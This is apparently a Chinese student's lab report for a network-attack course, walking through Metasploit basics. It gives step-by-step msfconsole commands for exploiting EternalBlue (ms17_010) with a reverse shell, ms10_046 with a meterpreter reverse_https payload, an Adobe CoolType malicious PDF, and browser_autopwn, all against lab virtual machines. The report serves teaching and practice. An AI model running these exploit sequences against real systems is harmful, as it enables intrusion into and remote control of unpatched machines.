zoukankan      html  css  js  c++  java
  • 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    实践原理

    1.MSF攻击方法
    • 主动攻击:扫描主机漏洞,进行攻击
    • 攻击浏览器
    • 攻击其他客户端
    2.MSF的六个模块
    • 查看六种模块源码目录/usr/share/metasploit-framework/modules

    • 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去

    • 辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提

    • 攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码

    • 空字段模块Nop Modules

    • 编码模块Encoders

    • 后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行

    3.MSF的三种用户操作界面
    msfconsole
    • 查看模块的具体信息info[exploits|auxiliary|post|payloads|encoders|nops]
    • 查看设置信息show [options]
    • 查看攻击目标类型show [target]
    • 查找命令search
    • 查找2018年产生的在windows平台下的漏洞search ms18(或CNE:2018) type:exploit platform:windows armitage
    • 启动服务器service postgresql start
    • 启动armitagearmitage
    • webgui
    4.MSF常用漏洞利用命令
    • search name:用指定关键字搜索可以利用的漏洞模块
    • use exploit name:使用漏洞
    • show options:显示配置选项
    • set option name option:设置选项
    • show payloads:回链攻击载荷
    • show targets: 显示目标(os版本)
    • set TARGET target number:设置目标版本
    • exploit:开始漏洞攻击
    • sessions -l:列出会话
    • sessions -i id:选择会话
    • sessions -k id:结束会话
    • Ctrl+z:把会话放到后台
    • Ctrl+c:结束会话
    • show auxiliary:显示辅助模块
    • use auxiliary name :使用辅助模块
    • set option name option:设置选项
    • exploit:运行模块
    2.实践内容概述
    • 一个主动攻击实践,如ms08_067; (1分)

    • 一个针对浏览器的攻击,如ms11_050;(1分)

    • 一个针对客户端的攻击,如Adobe;(1分)

    • 成功应用任何一个辅助模块。(0.5分)

    3.基础问题回答
    • 用自己的话解释什么是exploit,payload,encode
      • exploit是载具,连接漏洞,将payload传送到靶机中。
      • payload是载荷,是exploitshellcode中的主要功能代码,exploit把它送到靶机中后,是真正负责进行攻击代码。
      • encode是编码,用来改变payload,避免payload中出现漏洞无法处理的字符;其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

    实验步骤

    实验一:使用ms17_010_eternalblue进行主动攻击

    靶机:Windows Server 2008 ,ip地址192.168.216.137

    payload:generic/shell_reverse_tcp

    • 进入msfconsole

    • use exploit/windows/smb/ms17_010_eternalblue.rb //使用该模块

    • show payloads //查看载荷

    • set payload generic/shell_reverse_tcp //使用tcp反弹连接

    • set LHOST 192.168.216.130 //设置攻击机的IP,即KALI的IP地址

    • set LPORT 5301 //设置攻击端口

    • set RHOST 192.168.216.137 //设置靶机IP

    • set target 0 //选择自动目标系统类型

    • exploit进行攻击

    • 攻击成功

    攻击浏览器的实践

    • ms10_046

    • 靶机:Windows 7 + IE8

    • exploit : exploit/windows/smb/ms10_046_shortcut_icon_dllloader

    • payload : windows/meterpreter/reverse_https

    实验步骤
    • search ms10-046 //看看其他的exploit
    • use exploit/windows/smb/ms10_046_shortcut_icon_dllloader //使用漏洞
    • show payloads //显示可用攻击载荷
    • set windows/meterpreter/reverse_https //选择攻击载荷
    • show options //查看配置信息
    • set LHOST 192.168.126.130 //设置监听地址
    • set SRVHOST 192.168.126.130 //设置本地收听地址
    • set LPORT //设置端口号
    • exploit #开始攻击

    • 将生成的URL地址在winXP的IE中打开
    • 但是我在ie中打开失败了,更新ie8.0也没有解决
    • 同学说虚拟机windows XP sp3 中文版,会出现攻击失败的情况,重新更换靶机用windows XP SP3 英文版即可成功

    攻击客户端的实践

    • Adobe
    • 靶机:Windows XP
    • payload : windows/meterpreter/bind_tcp
    实验步骤
    • msfconsole //进入控制台
      -search adobe //进行查找

    • use windows/fileformat/adobe_cooltype_sing //使用漏洞

    • info //查看漏洞具体信息(重点当然是description)

    • set payload windows/meterpreter/bind_tcp //选择攻击载荷

    • show options //查看详细信息

    • set LPORT 5301 //设置端口号

    • set RHOST 192.168.1.148//设置靶机IP地址

    • exploit #攻击

    • 将生成的msf.pdf复制到Windows XP中

    • 攻击成功

    browser_autopwn 辅助模块(成功且唯一)

    • 通过search auxiliary 查找辅助模块,找到适合的进行运行
      过程

    • use auxiliary/server/browser_autopwn

    • info

    • set SRVHOST 192.168.216.130

    • set SRVPORT 5301

    • ````set LHOST 192.168.216.130```

    • run

    • 描述

      描述:这个模块有三个动作。第一个(和默认值)是使用客户端和服务器端组合的“webserver”对HTTP客户端进行指纹识别,然后自动利用它们。接下来是“defangeddetection”,它只执行指纹部分。最后,“list”只打印所有利用Web服务器操作将使用的模块当前匹配和排除选项。还添加了一个“list”命令,与运行action=list相同

    • 攻击成功

    实验总结与体会

    本次实验操作起来较为容易,,因为metasploit攻击漏洞的专一性,所以我在寻找主机上遇到了很多困难。必须要在特定环境和特定触发条件下才能成功。这也是实验的乐趣所在。

  • 相关阅读:
    P1121 环状最大两段子段和
    无题
    cdoj 1485 柱爷搞子串 sam treap
    自然数幂和
    Gym 100341C AVL Trees NTT
    线性筛分解质因子
    codeforces 366 Ant Man dp
    UVALive 6914 Maze Mayhem 轮廓线dp
    hdu 5790 Prefix 字典树 主席树
    莫比乌斯反演个人小结
  • 原文地址:https://www.cnblogs.com/CTF5301/p/10745959.html
Copyright © 2011-2022 走看看